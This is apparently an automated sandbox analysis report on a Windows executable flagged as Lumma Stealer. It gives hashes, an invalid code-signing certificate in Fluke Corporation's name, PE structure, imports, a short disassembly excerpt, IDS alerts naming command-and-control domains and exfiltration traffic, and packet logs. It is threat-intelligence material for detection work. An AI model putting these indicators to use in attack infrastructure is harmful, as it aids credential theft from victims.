                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          Drivespan.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          anrek.mp4.htaGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.390937610699197
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: BnJxmraqlk.exe
File size: 3'972'448 bytes
MD5: 356bde316f31cfc2ed244a7cdd359617
SHA1: 8bbf194502f5d3a15ebb6ab28d37ec2fe47f22a4
SHA256: f37b1604055cfa1d70ea439f2b38cb72a2da74bf6bba76b2e080e16146a53a5e
SHA512: a2798b679fd0c292a8511e4675c8bcf94559a8779d1ed32bc87271180dcf227fd2c8a272f02a8e665e079aaf1a467ae0369cb04b59075ff5af0904857745657c
SSDEEP: 98304:8QqQVFO4nrifgr2q7ZM4G3Ikgm3QZE6HpnoS0:8SVlChq7ZLkqTHpnI
TLSH: 1E06D02062919132F4B309754E7DA56E5558BF2D0729A0DB6BCCBD0F6EB2CD3AC31623
File Content Preview: MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......].(#..Fp..Fp..Fp...p..Fp...p..Fp...p..Fp...p..Fp...p..Fp...p..FpK.Bq?.FpK.Eq..FpK.Cq..Fp..Bq..Fp..Cq..Fp...p .Fp..Gp..Fp..Oq..F
Icon Hash: 090e9f4926060628
Entrypoint: 0x4b3172
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x6568A5C6 [Thu Nov 30 15:09:58 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 15fc4206176b296b631cb2e01986237f
Signature Valid: false
Signature Issuer: CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
• 01/09/2022 02:00:00, 01/09/2025 01:59:59
Subject Chain:
• CN=Fluke Corporation, O=Fluke Corporation, S=Washington, C=US
Version: 3
Thumbprint MD5: B75DE427E0EA4E6B3B95C02AA13899E3
Thumbprint SHA-1: CB5672B1690287612DD667CC32F597FC9373CEF5
Thumbprint SHA-256: E828776B6FBEC0BD0E09A28E8EC84B720EED7B5BA1F0FA0DA72FFE7BA4372472
Serial: 00BF83314740E574401A4602E8D0E8028D
Instruction
call 00007FB871185212h
jmp 00007FB8711841EFh
cmp ecx, dword ptr [005C4B80h]
jne 00007FB871184375h
ret
jmp 00007FB8711848FDh
call 00007FB8711843B4h
push 00000000h
call 00007FB8711846C9h
pop ecx
test al, al
je 00007FB871184380h
push 004B32C0h
call 00007FB871184873h
pop ecx
xor eax, eax
ret
push 00000007h
call 00007FB87118528Ch
int3
push ebp
mov ebp, esp
mov eax, dword ptr [005C4B80h]
and eax, 1Fh
push 00000020h
pop ecx
sub ecx, eax
mov eax, dword ptr [ebp+08h]
ror eax, cl
xor eax, dword ptr [005C4B80h]
                                                                                                                                                                                                                          pop ebp
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                          push FFFFFFFFh
                                                                                                                                                                                                                          push 004F8300h
                                                                                                                                                                                                                          mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                          mov eax, dword ptr [005C4B80h]
                                                                                                                                                                                                                          xor eax, ebp
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                                          push 00000FA0h
                                                                                                                                                                                                                          push 005CEA24h
                                                                                                                                                                                                                          call dword ptr [00586464h]
                                                                                                                                                                                                                          push 00595ED8h
                                                                                                                                                                                                                          call dword ptr [005863ECh]
                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                          test esi, esi
                                                                                                                                                                                                                          jne 00007FB871184387h
                                                                                                                                                                                                                          push 005AC7B8h
                                                                                                                                                                                                                          call dword ptr [005863ECh]
                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                          test esi, esi
                                                                                                                                                                                                                          je 00007FB871184402h
                                                                                                                                                                                                                          push 00595F1Ch
                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                          call dword ptr [00586430h]
                                                                                                                                                                                                                          push 00000038h
Programming Language:
• [C++] VS2008 SP1 build 30729
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x1c03d0        | 0x1f4        | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x1d0000        | 0x81cf4      | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x3c71a0        | 0x2bc0       |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x252000        | 0xb728       | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x1ad1a0        | 0x70         | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x1ad2b0        | 0x18         | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x186000        | 0x844        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x184840 | 0x184a00 | 9855412e2da264f2ab217cc995a9370f | False | 0.6110416582904471 | data | 7.07184336786379 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x186000 | 0x3d34e | 0x3d400 | 0f6839b2e310a00d3b54a395757d77c3 | False | 0.339827806122449 | data | 4.686746351783192 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1c4000 | 0xbd5c | 0x4c00 | e3ad00e9c5cf7936e43588c6735515d3 | False | 0.22353001644736842 | data | 4.67130238797671 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1d0000 | 0x81cf4 | 0x81e00 | 57611b6f3419cd5cde74553310089d51 | False | 0.20583192974013476 | data | 4.678111691894073 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x252000 | 0xb728 | 0xb800 | 78b59315d75600e036874c51a9265fd7 | False | 0.6608780570652174 | data | 6.652317513828573 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
pbpvjmsi | 0x25e000 | 0x10e1 | 0x200 | 4bf092a2827a83dffa0f6f4390a9b896 | False | 1.021484375 | data | 7.534238661608481 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
DAT | 0x1d03f0 | 0x32516 | PC bitmap, Windows 3.x format, 501 x 137 x 24, image size 206048, resolution 3780 x 3780 px/m, cbSize 206102, bits offset 54 | English | Great Britain | 0.1584409661235699
DAT | 0x202908 | 0x322f4 | PC bitmap, Windows 3.x format, 500 x 137 x 24, image size 205502, resolution 2834 x 2834 px/m, cbSize 205556, bits offset 54 | English | Great Britain | 0.2518632392146179
RT_ICON | 0x234bfc | 0x2d03 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9866354248025688
RT_ICON | 0x237900 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.06286229740920384
RT_ICON | 0x248128 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.1115375531412376
RT_ICON | 0x24c350 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.1754149377593361
RT_ICON | 0x24e8f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.2150562851782364
RT_ICON | 0x24f9a0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.3155737704918033
RT_ICON | 0x250328 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.48138297872340424
RT_STRING | 0x250790 | 0x702 | data | English | Great Britain | 0.2842809364548495
RT_STRING | 0x250e94 | 0x36a | data | English | Great Britain | 0.2494279176201373
RT_STRING | 0x251200 | 0x1e2 | data | English | Great Britain | 0.45643153526970953
RT_STRING | 0x2513e4 | 0x68 | data | English | Great Britain | 0.7403846153846154
RT_STRING | 0x25144c | 0x15c | data | English | Great Britain | 0.5689655172413793
RT_STRING | 0x2515a8 | 0x1b0 | data | English | Great Britain | 0.49074074074074076
RT_STRING | 0x251758 | 0x1b8 | data | English | Great Britain | 0.5227272727272727
RT_GROUP_ICON | 0x251910 | 0x68 | data | English | United States | 0.75
RT_VERSION | 0x251978 | 0x37c | data | English | United States | 0.46300448430493274
DLL | Import
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
MPR.dll | WNetAddConnection3W, WNetCancelConnection2W, WNetGetConnectionW, WNetOpenEnumW, WNetGetUserW, WNetGetUniversalNameW, WNetCloseEnum, WNetEnumResourceW
KERNEL32.dll | lstrcmpA, EnterCriticalSection, LeaveCriticalSection, EncodePointer, GlobalDeleteAtom, lstrcmpW, CompareStringW, InitializeCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, GlobalHandle, LocalReAlloc, SetThreadPriority, GlobalFlags, VirtualProtect, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, UnregisterWaitEx, QueryDepthSList, InterlockedPopEntrySList, LoadLibraryA, GetFileTime, GetFileAttributesExW, FileTimeToLocalFileTime, UnlockFile, SetEndOfFile, LockFile, OutputDebugStringW, GetStringTypeW, SwitchToThread, GetExitCodeThread, TryEnterCriticalSection, GetCPInfo, LCMapStringW, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetFileType, GetModuleHandleExW, GetFullPathNameW, GetFileSize, GlobalUnlock, GlobalLock, GetModuleHandleA, LoadLibraryExW, WriteConsoleW, SetStdHandle, ExitThread, FreeLibraryAndExitThread, HeapQueryInformation, GetCommandLineA, IsValidLocale, EnumSystemLocalesW, IsValidCodePage, GetOEMCP, GetTimeZoneInformation, GetConsoleMode, ReadConsoleW, GetConsoleCP, FindFirstFileExW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SystemTimeToFileTime, CreateEventW, SetEvent, OpenEventW, SetUnhandledExceptionFilter, ExitProcess, FindResourceExW, SetFilePointer, SetNamedPipeHandleState, WaitNamedPipeW, TransactNamedPipe, GetCurrentThreadId, TerminateProcess, GetStdHandle, DuplicateHandle, ExpandEnvironmentStringsW, VirtualFree, VirtualAlloc, OutputDebugStringA, CreateSemaphoreW, WaitForMultipleObjects, ReleaseSemaphore, GetTempFileNameW, GlobalFindAtomW, GlobalAddAtomW, MoveFileExW, GetSystemTime, GetLocalTime, GetACP, GetSystemDefaultLCID, GetLocaleInfoA, GetTempPathW, DeleteVolumeMountPointW, SetVolumeMountPointW, FindVolumeMountPointClose, FindNextVolumeMountPointW, FindFirstVolumeMountPointW, CopyFileW, DeleteFileW, CompareFileTime, WriteFile, TerminateThread, CreateThread, OpenProcess, GetProcessTimes, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetUserDefaultLCID, GetUserDefaultUILanguage, SetThreadLocale, GetThreadLocale, EnumDateFormatsExW, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetVolumePathNamesForVolumeNameW, GetVolumeNameForVolumeMountPointW, FindVolumeClose, FindNextVolumeW, FindFirstVolumeW, GetVersionExW, DnsHostnameToComputerNameW, GetComputerNameExW, CreateTimerQueue, SignalObjectAndWait, GetThreadPriority, GetLogicalProcessorInformation, SetPriorityClass, GetVolumeInformationW, MoveFileW, FindNextFileW, FindFirstFileW, GetFileAttributesW, SetFileAttributesW, QueryDosDeviceW, RemoveDirectoryW, CreateDirectoryW, GetDiskFreeSpaceExW, GetWindowsDirectoryW, GetDriveTypeW, GetModuleHandleW, LoadLibraryW, CreateMutexW, FormatMessageW, GetTickCount, FindClose, SetFilePointerEx, DeviceIoControl, FlushFileBuffers, ReadFile, GetFileSizeEx, Sleep, SetThreadExecutionState, GetCurrentThread, LocalAlloc, GlobalFree, GlobalAlloc, GetProcAddress, FreeLibrary, lstrlenW, CreateFileW, GetSystemDirectoryW, GetProcessHeap, DeleteCriticalSection, HeapDestroy, DecodePointer, HeapAlloc, RaiseException, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, HeapFree, FreeConsole, AttachConsole, VerSetConditionMask, VerifyVersionInfoW, GetVersion, GetModuleFileNameW, GetCommandLineW, GetExitCodeProcess, WaitForSingleObject, ResumeThread, CreateProcessW, GetCurrentProcessId, ProcessIdToSessionId, SetLastError, CloseHandle, GetCurrentProcess, FindResourceW, LoadResource, LockResource, SizeofResource, LocalFree, GetLastError, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, GetThreadTimes
USER32.dll | SetWindowsHookExW, GetLastActivePopup, GetTopWindow, GetClassNameW, GetClassLongW, SetWindowLongW, PtInRect, CopyRect, GetSysColor, MapWindowPoints, ScreenToClient, AdjustWindowRectEx, GetWindowRect, RemovePropW, GetPropW, SetPropW, RedrawWindow, ValidateRect, EndPaint, BeginPaint, SetForegroundWindow, GetForegroundWindow, SetMenu, LoadIconW, WinHelpW, MonitorFromWindow, GetMonitorInfoW, EnableWindow, GetCapture, GetKeyState, GetFocus, GetDlgCtrlID, IsWindowEnabled, SetWindowTextW, GetDC, ReleaseDC, GetSysColorBrush, LoadCursorW, GetWindowThreadProcessId, DrawTextW, DrawTextExW, CallNextHookEx, TranslateMessage, DispatchMessageW, PeekMessageW, SendMessageTimeoutW, GetActiveWindow, MsgWaitForMultipleObjectsEx, LoadStringW, SystemParametersInfoW, GetDlgItem, IsIconic, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPos, DestroyWindow, IsMenu, IsWindow, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, CallWindowProcW, DefWindowProcW, PostMessageW, GetMessageTime, GetMessagePos, RegisterWindowMessageW, GetWindow, GrayStringW, TabbedTextOutW, ClientToScreen, RealChildWindowFromPoint, DestroyMenu, CheckMenuItem, EnableMenuItem, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapW, PostQuitMessage, GetMenuItemCount, GetMenuItemInfoW, SetMenuItemInfoW, GetWindowLongW, GetWindowTextW, GetScrollPos, SendMessageW, GetSystemMetrics, CharUpperW, UnhookWindowsHookEx, GetMenuItemID, GetSubMenu, GetParent, OffsetRect, SetRectEmpty, GetMenu, GetClientRect, MessageBoxW
GDI32.dll | ScaleWindowExtEx, ScaleViewportExtEx, OffsetViewportOrgEx, SetWindowExtEx, SetViewportOrgEx, SetViewportExtEx, ExtTextOutW, TextOutW, GetDeviceCaps, SetBkColor, SetTextColor, CreateBitmap, SetMapMode, DeleteDC, DeleteObject, Escape, GetClipBox, GetStockObject, PtVisible, RectVisible, RestoreDC, SaveDC, SelectObject
WINSPOOL.DRV | OpenPrinterW, ClosePrinter, DocumentPropertiesW
ADVAPI32.dll | RegisterEventSourceW, GetTokenInformation, OpenProcessToken, CryptAcquireContextW, CryptReleaseContext, CryptGetHashParam, CryptCreateHash, CryptHashData, CryptDestroyHash, RegCloseKey, RegCreateKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegOpenKeyExW, RegQueryInfoKeyW, EqualSid, CheckTokenMembership, LogonUserW, ImpersonateAnonymousToken, ImpersonateLoggedOnUser, SetThreadToken, RevertToSelf, ConvertStringSidToSidW, ReportEventW, ConvertSidToStringSidW, DeregisterEventSource, ConvertStringSecurityDescriptorToSecurityDescriptorW, SetNamedSecurityInfoW, SetEntriesInAclW, StartServiceW, QueryServiceStatus, OpenServiceW, OpenSCManagerW, ControlService, CloseServiceHandle, RegUnLoadKeyW, RegLoadKeyW, LookupPrivilegeValueW, LookupAccountSidW, FreeSid, AllocateAndInitializeSid, AdjustTokenPrivileges, OpenThreadToken, RegSetValueExW, RegQueryValueExW
SHELL32.dll | SHGetMalloc, SHGetPathFromIDListW, SHGetSpecialFolderLocation, SHChangeNotify, SHFileOperationW, SHCreateDirectoryExW, SHGetFolderPathW, ShellExecuteExW
COMCTL32.dll |
SHLWAPI.dll | PathAppendW, PathFileExistsW, PathFindExtensionW, PathMatchSpecW, PathIsUNCW, PathStripToRootW, UrlUnescapeW, PathFindFileNameW, PathIsNetworkPathW
ole32.dll | CoInitialize, StringFromGUID2, CLSIDFromString, CoCreateInstance, CoUninitialize
OLEAUT32.dll | VariantChangeType, SysFreeString, SafeArrayGetUBound, SafeArrayAccessData, SafeArrayUnaccessData, GetErrorInfo, VariantTimeToSystemTime, SysAllocString, VariantInit, VariantClear
CRYPT32.dll | CryptMsgClose, CryptMsgGetParam, CertCloseStore, CertFindCertificateInStore, CertFreeCertificateContext, CryptHashCertificate, CertGetNameStringW, CryptQueryObject
                                                                                                                                                                                                                          ntdll.dllNtCreateFile, NtClose, RtlInitUnicodeString
                                                                                                                                                                                                                          OLEACC.dllLresultFromObject, CreateStdAccessibleObject
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-07T13:17:02.077301+0100 | 2058616 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) | 1 | 192.168.2.6 | 50553 | 1.1.1.1 | 53 | UDP
2025-01-07T13:17:02.089336+0100 | 2058598 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) | 1 | 192.168.2.6 | 52520 | 1.1.1.1 | 53 | UDP
2025-01-07T13:17:02.101884+0100 | 2058632 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop) | 1 | 192.168.2.6 | 49449 | 1.1.1.1 | 53 | UDP
2025-01-07T13:17:02.114724+0100 | 2058610 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop) | 1 | 192.168.2.6 | 56054 | 1.1.1.1 | 53 | UDP
2025-01-07T13:17:02.126175+0100 | 2058628 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) | 1 | 192.168.2.6 | 64159 | 1.1.1.1 | 53 | UDP
2025-01-07T13:17:02.138060+0100 | 2058618 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop) | 1 | 192.168.2.6 | 54615 | 1.1.1.1 | 53 | UDP
2025-01-07T13:17:02.146376+0100 | 2058622 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) | 1 | 192.168.2.6 | 64787 | 1.1.1.1 | 53 | UDP
2025-01-07T13:17:02.161242+0100 | 2058606 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) | 1 | 192.168.2.6 | 59347 | 1.1.1.1 | 53 | UDP
2025-01-07T13:17:02.830202+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49713 | 104.102.49.254 | 443 | TCP
2025-01-07T13:17:03.368085+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.6 | 49713 | 104.102.49.254 | 443 | TCP
2025-01-07T13:17:04.008393+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49714 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:04.333555+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49714 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:04.333555+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49714 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:04.851469+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49716 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:05.326910+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49716 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:05.326910+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49716 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:06.110725+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49722 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:10.766967+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49722 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:11.453443+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49758 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:12.721069+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49767 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:14.473566+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49783 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:15.813918+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49792 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:19.762590+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49819 | 104.21.48.1 | 443 | TCP
2025-01-07T13:17:20.231843+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49819 | 104.21.48.1 | 443 | TCP
• Total Packets: 126
• 443 (HTTPS)
• 53 (DNS)
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327104092 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327119112 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327172041 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327198982 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327222109 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327228069 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327271938 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327713013 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.328088045 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.328136921 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.328141928 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.331599951 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.331669092 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.331675053 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.383233070 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415430069 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415488958 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415522099 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415538073 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415544033 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415594101 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415597916 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415607929 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415642977 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415936947 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415946960 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415958881 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415963888 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.613301992 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.613343000 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.613409042 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.613749981 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.613766909 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.110625982 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.110724926 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.111840010 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.111850977 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.112086058 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.113682985 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.113907099 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.113943100 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.766974926 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.767052889 CET44349722104.21.48.1192.168.2.6
